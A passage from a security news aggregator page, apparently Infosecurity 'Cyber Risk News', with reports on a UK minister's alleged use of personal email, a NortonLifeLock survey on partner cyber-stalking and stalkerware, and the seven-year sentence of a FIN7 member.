There have previously been accusations of cronyism in the government’s awarding of large contracts for protective equipment (PPE) and other COVID-related items.

Last year, the Guardian revealed that a former publican whose pub was located close to Hancock’s constituency home in Suffolk won a £50 million contract for test-and-trace supplies despite running a company that had no experience producing such equipment.

The two are said to have communicated over WhatsApp and email, although it’s unclear if Hancock’s personal email was used on this occasion.

According to Cabinet Office guidelines a copy of any personal email used for government business should be sent to the minister’s departmental email address.

Security experts have warned that Hancock's alleged favoring of private email communications may have exposed the government to cyber-risk.

“Personal accounts are less secured and are not monitored by the government’s cybersecurity team. They are also cracked more easily than the encrypted accounts issued to ministers,” argued Mark Rodbert, Founder and CEO of cybersecurity firm IDAX Software.

“If a cyber-criminal can access a personal email, which is easier than you may think if the password is a combination of English words, they can control the email account.”

Jolyon Maugham, a lawyer who has litigated the government on unfairly awarding contracts during the pandemic, said it is not technically illegal for ministers to use personal emails.

However, he added: “It’s a bit like walking into a bank on a hot summer’s day wearing a balaclava, it’s not wrong in itself, but it is a strong sign that you are up to no good.”

Maugham claimed on Friday he has evidence, now with the Serious Fraud Office, of government corruption in the awarding of COVID-related contracts.

Categories: Cyber Risk News

Young Americans Twice as Likely to Cyber-stalk

Info Security - Fri, 06/25/2021 - 17:57
Young Americans Twice as Likely to Cyber-stalk

In the United States, young adults are more than twice as likely as older Americans to cyber-stalk their current or former romantic partners.

New research by NortonLifeLock found three in five Gen Z and Millennial American adults who have been in a romantic relationship (60% of those ages 18 to 39) have digitally checked up on an ex or current squeeze without their knowledge or consent. 

The same admission was made by just a quarter (24%) of Americans aged 40 years old or older. 

Survey responses about cyber-stalking and online habits were gathered from more than 10,000 adults 18+ across 10 countries, including 1,000 adults in the United States, as part of the "2021 Norton Cyber Safety Insights Report: Special Release – Online Creeping" report.

Nearly half of Americans aged 19 to 39 who are in a relationship said they wouldn't be surprised to find their partner was spying on them via an app. Two in five (42%) said they believe their significant other is at least somewhat likely to download creepware or stalkerware onto their device(s) to monitor activity such as text messages, phone calls, direct messages, emails, and photos. 

This figure is three times higher than the percentage of Americans aged 40 or older (14%) who gave the same response.

While more than one-third of Americans ages 18 to 39 said they considered it harmless to stalk a current or former partner online (35%), just 11% of Americans who are 40 or older agreed. 

Worryingly, 14% of Americans between the ages of 18 and 39 who have been in a romantic relationship admitted using an app to secretly monitor their partner’s device activity.

Men were found to be three times more likely than women to use an invasive app to spy on their partner.

The findings were published on June 24 as a special addendum to the 2021 Norton Cyber Safety Insights Report (NCSIR).

"Between September 2020 and May 2021, our research team found a 63% uptick in the number of devices infected with stalkerware, amounting to more than 250,000 compromised devices per month,” remarked Kevin Roundy, technical director and stalkerware specialist with Norton Labs, NortonLifeLock’s research division. 

“It’s alarming to think about this increase within the context of our study." 

Categories: Cyber Risk News

FIN7 Pen Tester to Serve Seven Years

Info Security - Fri, 06/25/2021 - 17:30
FIN7 Pen Tester to Serve Seven Years

A high-level member of the notorious organized cybercrime group FIN7 is to spend the next seven years in an American prison.

Hacker Andrii Kolpakov was an active member of FIN7 from at least April 2016 until his arrest in Lepe, Spain, on June 28, 2018. 

The 33-year-old Ukrainian national, who was referred to within the hacking group as a pen tester, pleaded guilty in June 2020 to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.

The dozens of members of FIN7 (also referred to as Carbanak Group and the Navigator Group, among other names) stole more than a billion dollars from hundreds of companies in the United States.  

Since at least 2015, the group used malware to hack into thousands of computer systems and exfiltrate millions of customer credit and debit card numbers. The stolen credentials were then either used by FIN7 or sold on to other cyber-criminals for profit. 

The group successfully breached the computer networks of businesses in all 50 states and the District of Columbia, stealing more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.

Most of the companies targeted by FIN7 in the United States were in the restaurant, gambling and hospitality industries. Among the group's many victims were Chipotle Mexican Grill, Chili’s, Arby’s, Red Robin and Jason’s Deli. 

FIN7 also attacked companies in Australia, France and the United Kingdom. 

Explaining how the group's nefarious scheme operated, the Department of Justice stated: "FIN7 carefully crafted email messages that would appear legitimate to a business’s employees and accompanied emails with telephone calls intended to further legitimize the emails. 

"Once an attached file was opened and activated, FIN7 would use an adapted version of the Carbanak malware, in addition to an arsenal of other tools, to access and steal payment card data for the business’s customers."

Kolpakov was extradited from Spain to the United States on June 1, 2019. On Thursday, he was sentenced to seven years in prison and ordered to pay restitution of $2.5m. 

Categories: Cyber Risk News

Pages